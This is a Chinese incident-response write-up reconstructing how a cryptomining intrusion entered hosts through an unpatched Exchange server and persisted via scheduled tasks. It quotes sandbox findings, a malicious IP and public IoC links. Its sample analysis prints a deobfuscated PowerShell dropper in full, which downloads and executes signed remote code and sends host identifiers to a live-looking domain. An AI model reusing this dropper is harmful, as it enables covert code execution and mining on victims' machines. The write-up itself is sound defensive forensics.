- “你那边什么情况,有点像哈希传递。”
- “被挖矿了,但是这边的运维重装过主机。”
- “我去,截下来样本没,排查完了吗?”
- “一部分日志和样本截留下来了,但是还没排查完,帮忙看看怎么进来。”
PS:以下数据已经脱敏,聊天记录不会截图,只分享经验和思路,这是一次条件极为有限的排查。 0x01 确认到手情报 首先来看一下,同事手上有啥情报。
- 1.在被感染主机上发现计划任务。
- 2.拉取了主机上web日志,发现存在哈希传递。
- 3.powershell下提取到了攻击样本。
- 4.感染了10台左右主机,已经重装系统。
- 5.暂时认定邮件系统为打击入口。
好吧,其实问题不大。【都被清光了】,我过去只是大概还原一下攻击过程、清理痕迹和写报告。
0x02 分析攻击行为
康康到底是咋回事,接下来一条一条情报来分析。
天融信的设备发出的告警如下:
一、确认打击点、利用点
1.常规排查
网络外连情况:无特殊情况。
开机启动项情况:没有自动项
最近启动程序情况:没有乱码程序启动
windows安全日志情况:
无新增用户、没有日志都是登陆,注销日志没有异常
2.计划任务排查:
计划任务名称:backball、backball1
启动路径结合下面的web日志可以看出是powershell下的一个乱码程序
触发器:在首次触发后,无限期地每隔02:00:00重复一次。
3.web日志
在web日志中,可以看见大量的POST请求,访问的是exchage邮件服务器。并且通过mailbox字段可以知道,已经泄露出了一个邮箱,攻击者应该就是从这里进来的。
二、还原攻击过程
三、攻击样本分析
1.先看沙箱分析
沙箱中已经存在这种恶意文件,也就是说之前有人提交过。
(1)发现一个外连地址 1.117.58.154,被标红了。
(2)该恶意文件可以检查宿主机的内存和网络接口,以此反虚拟机。
(3)开启端口并监听,获取系统时间。
2.powershell分析
其实只分析那个Powershell就够了,ps1文件解码出来太大了,如果需要请私信我。
解码后的ps1文件:
powershell -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('xpVT7bCpITDUjAvmzli55WPVFPjQBos7o9/ZbbWzyeaKIn9NLJwvY6ad3rMGoXzT6mz 51VupKm5TQvk79oVK4QQDZErhr0szpUdW79j2WPhbmpZrwMdgmFHrqG6Np InWy/V1acp09/W9x54mpQ1EHIos1 JhSrYPaq8WtsGW0=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://' 't.jus' 'anrihua.com';a($url '/a.jsp?rep_20210713?' (@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
大概就是:从这里能看出来大部分东西了,生成的exe也是能被杀的,分析也没啥意义
0x03 总结
通过分析得出,因为该服务器的exchange版本过低且没有进行补丁更新。被攻击者成功利用最近的exchange漏洞攻入,并利用计划任务的方法达到定时启动恶意挖矿程序和不死属性驻留主机。
通过特征可以溯源出是cs的powershell马,然后将其解码可以知道它的行为。
因为缺乏全流量设备的支撑,无法获取dns解析记录、相关IPS日志等监控记录,部分Windows日志也被重装丢失掉,只能到此为止。
相关链接:
//国外相关分析 https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html //github记录木马表格 https://github.com/sophoslabs/IoCs/blob/master/Trojan-LDMiner.csv //沙箱分析记录 https://s.threatbook.cn/report/file/fae6a3a4e5b11cdc8a982798167de4c1aafd101cc8726ba520c420d1ef381a9d/?env=win7_sp1_enx64_office2013 //powershell混淆解码 https://www.freebuf.com/articles/system/181697.html //解码ps1 https://www.powershellgallery.com/packages/PowerSploit/3.0.0.0/Content/CodeExecutionInvoke-ReflectivePEInjection.ps1
